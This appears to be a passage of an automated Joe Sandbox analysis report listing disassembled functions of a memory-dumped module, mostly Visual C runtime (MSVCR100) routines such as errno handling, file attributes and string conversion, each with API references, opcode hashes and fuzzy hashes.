                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$Process$??0scheduler_resource_allocation_error@Concurrency@@DuplicateErrorExceptionHandleLastThreadThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 4210591502-0
                                                                                                          • Opcode ID: 8cdc957682d2d8d1ff4b4a31df0890cab974628f2b6590d2e8ba1cadae2fb2e2
                                                                                                          • Instruction ID: 369e7dafc0d3c5b5ccbc93e3b496b20b31ece939362107a29a3e6e812af8852e
                                                                                                          • Opcode Fuzzy Hash: 8cdc957682d2d8d1ff4b4a31df0890cab974628f2b6590d2e8ba1cadae2fb2e2
                                                                                                          • Instruction Fuzzy Hash: F8F090B2A0471666DB50ABB08C1DF9F3AACBF05750F444624B612DB0C0DB34F4118BA0
                                                                                                          Function 6FDF41D3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _FindAndUnlinkFrame.MSVCR100(?,6FDF41BF,?), ref: 6FDF41DC
                                                                                                            • Part of subcall function 6FD983D1: _getptd.MSVCR100 ref: 6FD983D7
                                                                                                            • Part of subcall function 6FD983D1: _getptd.MSVCR100 ref: 6FD983EB
                                                                                                          • _getptd.MSVCR100(6FDF41BF,?), ref: 6FDF41E2
                                                                                                          • _getptd.MSVCR100(6FDF41BF,?), ref: 6FDF41F0
                                                                                                          • _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6FDF4233
                                                                                                          • __DestructExceptionObject.MSVCR100(00000000,00000000), ref: 6FDF4241
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 473968603-1018135373
                                                                                                          • Opcode ID: 3f10fad894707037d4f1be91083b805b1c86e0196aeef020e4e17791f3ad9fd2
                                                                                                          • Instruction ID: bb1ad29caa8a1bc362d542bf8d4b6db622e9d8fa011eff979f33ebb4fe9c8585
                                                                                                          • Opcode Fuzzy Hash: 3f10fad894707037d4f1be91083b805b1c86e0196aeef020e4e17791f3ad9fd2
                                                                                                          • Instruction Fuzzy Hash: A0014B39816705CADBA49F60D540E9DB3F5BF03211F96462ED451DB6A1CB32B682CB21
                                                                                                          Function 6FDCE946 Relevance: 10.5, APIs: 7, Instructions: 35COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCE951
                                                                                                          • _errno.MSVCR100 ref: 6FDCE959
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCE964
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 6FDCE971
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE97C
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDCE983
                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 6FDCE99D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile$ErrorLast__doserrno_dosmaperr_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2713031092-0
                                                                                                          • Opcode ID: d9c0af64d36b00f37bded13161cb4443b9fb597f4f8d739d6f4601677c34e088
                                                                                                          • Instruction ID: 395c9f21d6d2f6a4f0673fdd28df7be0678d6baf72b15d60712375f3cb4f8c81
                                                                                                          • Opcode Fuzzy Hash: d9c0af64d36b00f37bded13161cb4443b9fb597f4f8d739d6f4601677c34e088
                                                                                                          • Instruction Fuzzy Hash: 67F030B1414708EADBC01BB4D9057693B9CAF02376F155315F4388A5E0DF74F4519662
                                                                                                          Function 6FDD0307 Relevance: 10.5, APIs: 7, Instructions: 35COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0312
                                                                                                          • _errno.MSVCR100 ref: 6FDD031A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD0325
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 6FDD0332
                                                                                                          • GetLastError.KERNEL32 ref: 6FDD033D
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDD0344
                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 6FDD035E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile$ErrorLast__doserrno_dosmaperr_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2713031092-0
                                                                                                          • Opcode ID: 4ef8b9ee704a7458509e7f09e881a49ca371c0b68843910309f19d02bb2e2d14
                                                                                                          • Instruction ID: 555d8128f94fb6c8376c15868d9561959ee7d5470ccd0b270bcc39eca36c08b9
                                                                                                          • Opcode Fuzzy Hash: 4ef8b9ee704a7458509e7f09e881a49ca371c0b68843910309f19d02bb2e2d14
                                                                                                          • Instruction Fuzzy Hash: 7FF0B431414B48EBDB803BB5DD0C7993B98AF823B5F089311F438880E4DB31F4519760
                                                                                                          Function 6FDDAA01 Relevance: 9.2, APIs: 6, Instructions: 192COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          • Opcode ID: d552fdc41d0a17269453c049ea4ab7478cc2383e6b2677a25f3d3619a094d3df
                                                                                                          • Instruction ID: 5b54b9314ebd551fda38b1522a27f5c863b47939cc4b898c52c37be157745826
                                                                                                          • Opcode Fuzzy Hash: d552fdc41d0a17269453c049ea4ab7478cc2383e6b2677a25f3d3619a094d3df
                                                                                                          • Instruction Fuzzy Hash: 4951C239351311CBE364CF6DC980706B3A2AF59728B24E65AF405CF2A2E376F8438795
                                                                                                          Function 6FDDC428 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,00000000,00000000), ref: 6FDDC4BC
                                                                                                          • _errno.MSVCR100(?,00000001,00000000), ref: 6FDDC4E0
                                                                                                          • _errno.MSVCR100(?,00000001,00000000), ref: 6FDDC4FE
                                                                                                          • _isleadbyte_l.MSVCR100(00000001,00000001,00000001,?,00000001,00000000), ref: 6FDDC523
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,00000001,?,00000001,00000000), ref: 6FDDC56B
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,00000001,?,00000001,00000000), ref: 6FDDC59E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$_errno$_isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 3480106409-0
                                                                                                          • Opcode ID: 97af164e9605cb4876375074a0314594c6156bdf1291e87e94274f30f50f4873
                                                                                                          • Instruction ID: 12e984f028b95b88400550eac65145595d3efc3a1a2c6e4a148259a5293ebc25
                                                                                                          • Opcode Fuzzy Hash: 97af164e9605cb4876375074a0314594c6156bdf1291e87e94274f30f50f4873
                                                                                                          • Instruction Fuzzy Hash: 08518175600356EFEB628F24C844BBA3BA4AF42359F05855AF864CF2D0D730F941CBA1
                                                                                                          Function 6FDDBE1D Relevance: 9.1, APIs: 6, Instructions: 130COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(00000000), ref: 6FDDBE42
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000), ref: 6FDDBE4C
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100(?,00000000), ref: 6FDDBE6F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000000), ref: 6FDDBE79
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          • Opcode ID: f8d62fb2cc519ccc1b173b6b98df683905a8afb76bd169c3e93dca9fd56eedde
                                                                                                          • Instruction ID: 5553897fe47d5220531e91f64b87a1c36c5d7e67bb93c3bbed7ddf5ece62d967
                                                                                                          • Opcode Fuzzy Hash: f8d62fb2cc519ccc1b173b6b98df683905a8afb76bd169c3e93dca9fd56eedde
                                                                                                          • Instruction Fuzzy Hash: 4441E131905349DFD751DF788854BEA7BB4AF0631CF144286F9A09B2D1DB32B801CBA1
                                                                                                          Function 6FD8ACEE Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(0000000B,6FD8AD58,00000018,6FD8AFDD,00000000,?), ref: 6FD8AD15
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • EnterCriticalSection.KERNEL32(?,6FD8AD58,00000018,6FD8AFDD,00000000,?), ref: 6FD8AD94
                                                                                                          • _calloc_crt.MSVCR100(00000020,00000040,6FD8AD58,00000018,6FD8AFDD,00000000,?), ref: 6FDB04B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterSection$_calloc_crt_lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3858677252-0
                                                                                                          • Opcode ID: f3bcfad53f47deb2df7d4706e4c5eb091ad06c67dc35fa0e1316c7baa775ebde
                                                                                                          • Instruction ID: 6e66cdf156b0b1c857c85cebd2d76f8f1e6af6246f0339f731b7920c1294c345
                                                                                                          • Opcode Fuzzy Hash: f3bcfad53f47deb2df7d4706e4c5eb091ad06c67dc35fa0e1316c7baa775ebde
                                                                                                          • Instruction Fuzzy Hash: E741F071905745DBEB908F68C94839DBBB0BF06365F18871EC076AB2D1EBB4B941CB21
                                                                                                          Function 6FDDA220 Relevance: 9.1, APIs: 6, Instructions: 116timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDA246
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDA250
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _get_timezone.MSVCR100(?), ref: 6FDDA271
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6FDDA297
                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,23C34600,00000000), ref: 6FDDA2D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$FileInformationSystemZone_errno_get_timezone_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192550737-0
                                                                                                          • Opcode ID: 06247ff09dcb7ad46fc99dde8e6e6e3529ebff3b8370a5ebb8b5be43beb04119
                                                                                                          • Instruction ID: e752fede13ef822d7bf6658ccac7acf0002a1cf04cc444e39fb5a5c6ae4c33b0
                                                                                                          • Opcode Fuzzy Hash: 06247ff09dcb7ad46fc99dde8e6e6e3529ebff3b8370a5ebb8b5be43beb04119
                                                                                                          • Instruction Fuzzy Hash: 5B41F871904318DBDB60DFA8CC45F9A77B9FF46724F10419AF11897281DB307A80CB65
                                                                                                          Function 6FDE0004 Relevance: 9.1, APIs: 6, Instructions: 103stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDE002C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDE0036
                                                                                                          • strnlen.MSVCR100(?,00000000), ref: 6FDE0046
                                                                                                          • __crtLCMapStringA.MSVCR100(?,?,00000100,?,00000002,?,00000002,?,00000001,?), ref: 6FDE009B
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?), ref: 6FDE00E6
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?), ref: 6FDE00F4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$String__crt_invalid_parameter_noinfostrnlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2181804011-0
                                                                                                          • Opcode ID: 5f84a4c38ad81a98f7787c1c2d155f87fc3f70e2dd95c320f609716db79b742c
                                                                                                          • Instruction ID: 8b922598b00f281c8f11523c62470e5af242e8038d4a65ebd7ec066d722211db
                                                                                                          • Opcode Fuzzy Hash: 5f84a4c38ad81a98f7787c1c2d155f87fc3f70e2dd95c320f609716db79b742c
                                                                                                          • Instruction Fuzzy Hash: D2314C30504389EFEB529B74C888FEE3BA0AF02394F149495E5A45F1C6DB71B482E761
                                                                                                          Function 6FDB87E8 Relevance: 9.1, APIs: 6, Instructions: 102threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentThread.KERNEL32 ref: 6FDB886E
                                                                                                          • memset.MSVCR100(?,00000000,0000000C), ref: 6FDB88A9
                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,6FDBD091,?,00000000), ref: 6FDB88D7
                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?,00000000), ref: 6FDB8903
                                                                                                          • TlsGetValue.KERNEL32(?,?,00000024,6FDC28C6,?,00000000,?,6FDC2AD0,?,?,00000000,?,?,00000000,?), ref: 6FDB8925
                                                                                                          • TlsSetValue.KERNEL32(?,00000000,?,6FDC2AD0,?,?,00000000,?,?,00000000,?), ref: 6FDB8930
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSectionValue$CurrentEnterLeaveThreadmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 510865635-0
                                                                                                          • Opcode ID: 735b717cf0c13d2f195f67ac11a16fa62d5c461c63054ad451de7753d20d1732
                                                                                                          • Instruction ID: 67925d1816e2789c698ed23524047316f8453536b9f392e1b60bd3fa1f134988
                                                                                                          • Opcode Fuzzy Hash: 735b717cf0c13d2f195f67ac11a16fa62d5c461c63054ad451de7753d20d1732
                                                                                                          • Instruction Fuzzy Hash: C9412775A04216CFCF08DF20D4D4A9ABBB5FF09315B16169DE806AF296DB34F842CB91
                                                                                                          Function 6FD86332 Relevance: 9.1, APIs: 6, Instructions: 93COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00000001,?,?,?,?,6FD86435,?,?,?), ref: 6FD86375
                                                                                                          • memset.MSVCR100(00000000,00000000,00000000,?,?,?,6FD86435,?,?,?,?,?,?,?,?,?), ref: 6FD863BB
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 6FD863D0
                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6FD863DE
                                                                                                          • _freea_s.MSVCR100(00000000), ref: 6FD863E8
                                                                                                          • malloc.MSVCR100(00000008,?,?,?,6FD86435,?,?,?,?,?,?,?,?,?,?,?), ref: 6FDB0CE9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$StringType_freea_smallocmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1641661924-0
                                                                                                          • Opcode ID: 2d3c0e5637d99e153a9e144f3ed6aaca531af6b93d8e1d8232b75d245ab627b7
                                                                                                          • Instruction ID: d87e32d50fe3952d0fb010ab4124ddf5803056221334a25d1339c5c0551fc678
                                                                                                          • Opcode Fuzzy Hash: 2d3c0e5637d99e153a9e144f3ed6aaca531af6b93d8e1d8232b75d245ab627b7
                                                                                                          • Instruction Fuzzy Hash: 4E318F7261020AEFEF409F69DC849AF7BA9EB4A364F15402AF925D7150D730FD60DB60
                                                                                                          Function 6FD80287 Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,?,6FD8033A,?,?,00000000), ref: 6FDA7946
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,6FD8033A,?,?,00000000), ref: 6FDA7950
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD8033A,?,?,00000000), ref: 6FDA795C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6FD8033A,?,?,00000000), ref: 6FDA7966
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD8033A,?,?,00000000), ref: 6FDA7972
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,6FD8033A,?,?,00000000), ref: 6FDA7991
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819658684-0
                                                                                                          • Opcode ID: 723feabb71bdb69743214e0a2ab3f7a9526cdfea19aedd5265fede523c13f290
                                                                                                          • Instruction ID: 8728ecb21f6a2abc0308ac84d3e54ab4804f2c690494a38f8d114aa7e1361cf7
                                                                                                          • Opcode Fuzzy Hash: 723feabb71bdb69743214e0a2ab3f7a9526cdfea19aedd5265fede523c13f290
                                                                                                          • Instruction Fuzzy Hash: 91219D72252317EBC7642F78C89458E7365FF067A4B20923FE1624B294E771B881C3D9
                                                                                                          Function 6FD84396 Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6FD843D7
                                                                                                            • Part of subcall function 6FD8254C: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6FD82590
                                                                                                          • _towlower_l.MSVCR100(00000000,?,?,?,?,?,?), ref: 6FD843EA
                                                                                                          • _errno.MSVCR100(?), ref: 6FDAC4F1
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDAC4FC
                                                                                                          • _errno.MSVCR100(?,?), ref: 6FDAC517
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6FDAC522
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
